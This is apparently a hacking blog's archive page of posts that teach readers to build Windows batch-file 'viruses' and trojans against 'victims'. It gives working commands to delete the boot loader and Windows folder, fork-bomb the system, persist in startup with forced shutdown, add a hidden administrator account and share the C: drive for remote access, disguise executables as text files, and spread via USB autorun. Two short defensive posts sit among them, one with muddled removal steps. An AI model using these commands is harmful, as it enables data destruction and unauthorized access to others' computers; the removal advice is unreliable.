Showing posts with label Viruses. Show all posts

Thursday, October 21, 2010

How to create Batch file viruses?

What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,

Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat

Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes,

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.

:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.

2. copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts .

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again.

4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.

The viruses we just coded -:

Note : Most of the batch viruses are simply undetectable by any anitiviruses

Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.

Download this Batch To Exe coverter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.

Open notepad and write

[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

About The Author

This is a guest post written by Aneesh M Makker. Aneesh M.Makker is an Ethical hacker from Malout, a town in Punjab.Click here to visit his Facebook Profile

Monday, May 17, 2010

How to secure your network from Trojans

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.

Is trojan virus Dangerous?

The short answer is yes, and the long answer is sometimes No, because there are near a thousand different trojan horse viruses and they all will most likely alter your computer in some way or another.

Working of Trojans!

Types of Trojans:

1.Remote Access Trojans

2.Password Sending Trojans

3.Keyloggers

4.Destructive Trojans

5.Denial of Service (DoS) Attack Trojans

6.Proxy/Wingate Trojans

7.FTP Trojans

8.Software Detection Killers

How to Get Rid of Trojans:
Here are some practical tips to avoid getting infected (again). For more general security information, please see our main security help page.

NEVER download blindly from people or sites which you aren't 100% sure about. In other words, as the old saying goes, don't accept candy from strangers. If you do a lot of file downloading, it's often just a matter of time before you fall victim to a trojan.
Even if the file comes from a friend, you still must be sure what the file is before opening it, because many trojans will automatically try to spread themselves to friends in an email address book or on an IRC channel. There is seldom reason for a friend to send you a file that you didn't ask for. When in doubt, ask them first, and scan the attachment with a fully updated anti-virus program.
Beware of hidden file extensions! Windows by default hides the last extension of a file, so that innocuous-looking "susie.jpg" might really be "susie.jpg.exe" - an executable trojan! To reduce the chances of being tricked, unhide those pesky extensions.
NEVER use features in your programs that automatically get or preview files. Those features may seem convenient, but they let anybody send you anything which is extremely reckless. For example, never turn on "auto DCC get" in mIRC, instead ALWAYS screen every single file you get manually. Likewise, disable the preview mode in Outlook and other email programs.
Never blindly type commands that others tell you to type, or go to web addresses mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones). If you do so, you are potentially trusting a stranger with control over your computer, which can lead to trojan infection or other serious harm.
Don't be lulled into a false sense of security just because you run anti-virus programs. Those do not protect perfectly against many viruses and trojans, even when fully up to date. Anti-virus programs should not be your front line of security, but instead they serve as a backup in case something sneaks onto your computer.
Finally, don't download an executable program just to "check it out" - if it's a trojan, the first time you run it, you're already infected!

Hope you liked the post ! Kindly give your feedback by comenting!

Sunday, October 4, 2009

How to Create a trojan in .bat file

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.
In this post i will tell you How to create your own trojan horse in a .bat file,Helping you to hack into another persons computer.I had previously posted a tutorial on How to sent a trojan as a txt file but this post will explain you creating a Trojan in a .bat file to infect a Remote computer.

Creating a Trojan in a .bat file - Procdure

dir
pause

And now save this as test.bat and execute it.

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know which version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access.

Hope you liked the post! Pass the comments

Wednesday, September 30, 2009

How to sent a trojan horse virus as txt file

Hello Friends Today I am Going to Explain you that How to Send Trojans as a Text Files that will execute your desired codes..
AS you all know that .exe is a Executable File and can run a Code .In this Guide I will teach you How to make a .txt executable that can run all of your codes binded or crypted behind it.

What is a trojan horse?

A Trojan horse, or trojan for short, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system. The term comes from the Trojan Horse story in Greek mythology. Trojan horses are not self-replicating which distinguishes them from viruses and worms. Additionally, they require interaction with a hacker to fulfill their purpose.

Purpose of Trojan horses?

Trojan horses are designed to allow a hacker remote access to a target computer system. Once a Trojan horse has been installed on a target computer system it is possible for a hacker to access it remotely and perform various operations. The operations that a hacker can perform are limited by user privileges on the target computer system and the design of the Trojan horse.

Send Trojans as a Text Files - Method

1. First of all You have to download the TEXT ICON PACK .
You can Download It From Below:

Download

2. Extract the Icon Pack to Obtain the Text Icons.

3. Open a new file, Right click - New - Shortcut
Type the location of the item: "X:\WINDOWS\system32\cmd.exe /c file.txt" (where stands for "X"=Drive)

and name it "Readme.txt" (without quotes)

4. After creating the readme.txt file right click on it and choose - Properties
in the - "Start in" fill - "%currentdir%" , in the - "Run" choose - "Minimized".

5. Then change the icon with one of the TXT icons from the pack by right clicking the readme.txt file then -
Properties - Change Icon...

6. In order to execute a file you need one..
just change your Server/Virus extension to .TXT and name it - "file.txt"

Now you have a .TXT Shortcut and .TXT Executable, when opening the txt shortcut it opens a command
- "C:\WINDOWS\system32\cmd.exe /c test.txt" that executes the file you want.

7. Now the readme.txt executes a command window, in order to hide it Right click on the "readme.txt" and choose - Properties - Layout and reduced the size on the window to height=1 and width=1.
Now change the window position to height=999 and width=999.

8. Now you are ready to sent a trojan as a txt file..

Warning:This post How to sent a trojan virus in a txt file is for educational purposes

Thursday, September 17, 2009

How to make a facebook virus

I heard from many of my friends that a virus is spreading on facebook which delete our accounts,I first thought it could have been a trojan that spread out,Then i found out that its just simple prank to shutdown your pc,Now today i will show you how to make a facebook virus to trick your friends
In this tutorial I will show you how to make a Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .
Making a fake facebook virus!

1) Open notepad
2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

3) Save it as something.bat
4)Right click on Internet Explorer .bat and click Create Shortcut
5)Right click on shorcut and click Properties.
6) Click Change Icon
7.Choose Internet Explorer icon or similar , click OK , then click Apply

Now your facebook virus is almost ready

8).Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:

Thursday, May 14, 2009

How to manually remove Trojan Horse

Is trojan virus Dangerous?

The short answer is yes, and the long answer is sometimes, because there are near a thousand different trojan horse viruses and they all will most likely alter your computer in some way or another.

Working of Trojans!

In this tutorial i will tell you a method through which you can manually remove a Trojan horse,Sometimes atrojan horse disables your antivirus and prevent any other Antivirus from being installed

1-Go to my computer
2-Drive c
3-Program Files
4-Common flies
5-Microsoft shared
6- Ms info or msinfo 32

The virus might hide it self in startup so delete the temporarily internet file

Is there any way to prevent Trojan attack?
I have wrote an article on How to secure your network from trojans this will explain on How to keep Trojans out of your PC

Thursday, March 26, 2009

Make virus in just one minute

Plx Reply and show your feed back
Here is a simple and easy trick to make a virus in less than 1 minute. :)

CAUTION: DO NOT RUN THE PROGRAM ON YOUR COMPUTER OR YOU WILL LOSE YOUR WINDOWS.

HERE'S THE To Make the virus:

1.Go to notepad,
2. Type erase C:\WINDOWS,
3. Save IT AS SOMETHING.cmd ,
4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

How does this works?
The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Take care it is a simple but powerful virus.

ebes hacking articles